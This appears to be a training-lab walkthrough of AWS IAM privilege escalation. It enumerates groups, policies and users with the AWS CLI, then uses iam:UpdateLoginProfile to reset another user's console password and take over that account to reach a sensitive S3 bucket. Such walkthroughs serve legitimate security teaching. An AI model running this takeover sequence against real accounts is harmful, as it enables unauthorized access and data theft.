Using the provided Access Key ID and Secret Access Key, configure your AWS CLI profile.
aws configure --profile updatelogin
Enumerate your user’s permissions:
aws iam list-groups --profile updatelogin
Code language: PHP (php)
{
"Groups": [
{
"Path": "/",
"GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
"GroupId": "AGPA5M7PA4Z555SJEHAYD",
"Arn": "arn:aws:iam::921234892411:group/iam-updateloginprofile-privesc-1701726668596-Developers",
"CreateDate": "2023-12-04T21:51:37+00:00"
}
]
}
Code language: JSON / JSON with Comments (json)
List policies for this group:
aws iam list-group-policies --group-name iam-updateloginprofile-privesc-1701726668596-Developers --profile updatelogin
Code language: PHP (php)
{
"PolicyNames": [
"iam-updateloginprofile-privesc-1701726668596-policy"
]
}
Code language: JSON / JSON with Comments (json)
Now list the permissions in this policy:
aws iam get-group-policy --group-name iam-updateloginprofile-privesc-1701726668596-Developers --policy-name iam-updateloginprofile-privesc-1701726668596-policy --profile updatelogin
Code language: JavaScript (javascript)
{
"GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
"PolicyName": "iam-updateloginprofile-privesc-1701726668596-policy",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"iam:UpdateLoginProfile",
"iam:ListAccessKeys",
"iam:ListAttachedUserPolicies"
],
"Resource": [
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
],
"Effect": "Allow"
},
{
"Action": [
"iam:ListGroupPolicies",
"iam:ListPolicies",
"iam:ListPolicyVersions",
"iam:ListUserPolicies",
"iam:ListUsers",
"iam:ListGroups",
"iam:ListGroupsForUser",
"iam:GetPolicy",
"iam:GetPolicyVersion",
"iam:GetRole",
"iam:GetRolePolicy",
"iam:GetUser",
"iam:GetUserPolicy",
"iam:GetGroupPolicy"
],
"Resource": "*",
"Effect": "Allow"
},
{
"Action": [
"s3:ListBucket"
],
"Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411",
"Effect": "Allow"
},
{
"Action": [
"s3:GetObject"
],
"Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411/*",
"Effect": "Allow"
},
{
"Action": [
"s3:ListAllMyBuckets",
"s3:GetBucketLocation"
],
"Resource": "*",
"Effect": "Allow"
},
{
"Action": [
"iam:UpdateLoginProfile"
],
"Resource": [
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
],
"Effect": "Deny"
}
]
}
}
Code language: JSON / JSON with Comments (json)
By viewing your policy, you get quite a bit of information back. Including that you are able to list users in this account:
aws iam list-users --profile updatelogin
Code language: PHP (php)
{
"Users": [
{
"Path": "/",
"UserName": "iam-updateloginprofile-privesc-1701726668596-Alice",
"UserId": "AIDA5M7PA4Z5VBTREZO3L",
"Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice",
"CreateDate": "2023-12-04T21:51:37+00:00"
},
{
"Path": "/",
"UserName": "iam-updateloginprofile-privesc-1701726668596-Attacker",
"UserId": "AIDA5M7PA4Z5TE63N6QMD",
"Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
"CreateDate": "2023-12-04T21:51:14+00:00"
},
{
"Path": "/",
"UserName": "iam-updateloginprofile-privesc-1701726668596-Bob",
"UserId": "AIDA5M7PA4Z5SGDBSVMK6",
"Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob",
"CreateDate": "2023-12-04T21:51:37+00:00"
},
{
"Path": "/",
"UserName": "iam-updateloginprofile-privesc-1701726668596-Mark",
"UserId": "AIDA5M7PA4Z57CYAWOOIP",
"Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
"CreateDate": "2023-12-04T21:51:37+00:00"
}
]
}
Code language: JSON / JSON with Comments (json)
This result shows us that there are multiple IAM users:
- Alice
- Bob
- Mark
Which one should we attack?
Well, if we look at the IAM policy attached to our group, we have:
{
"Action": [
"iam:UpdateLoginProfile",
"iam:ListAccessKeys",
"iam:ListAttachedUserPolicies"
],
"Resource": [
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
],
"Effect": "Allow"
},
Code language: JavaScript (javascript)
But then we have an explicit deny:
{
"Action": [
"iam:UpdateLoginProfile"
],
"Resource": [
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
"arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
],
"Effect": "Deny"
}
Code language: JSON / JSON with Comments (json)
That means we cannot UpdateLoginProfile
on Mark or Alice, it has to be Bob.
aws iam update-login-profile --user-name iam-updateloginprofile-privesc-1701727836920-Bob --password 'JzreMu8KXF9RvTpb2sSRJqyd5uioMi' --no-password-reset-required --profile updatelogin
Code language: JavaScript (javascript)
We can now use the username, AWS account ID, and the password we provided, in order to log into the AWS console:
https://signin.aws.amazon.com/signin
Once logged in (sometimes it can be finicky), make sure you change to “N. Virginia” as the region. It might default to something else.
From there, you can access Amazon S3 to find a bucket containing sensitive data that you can then download. Submit the flag by copy/pasting Joshua Lee’s credit card number.
Responses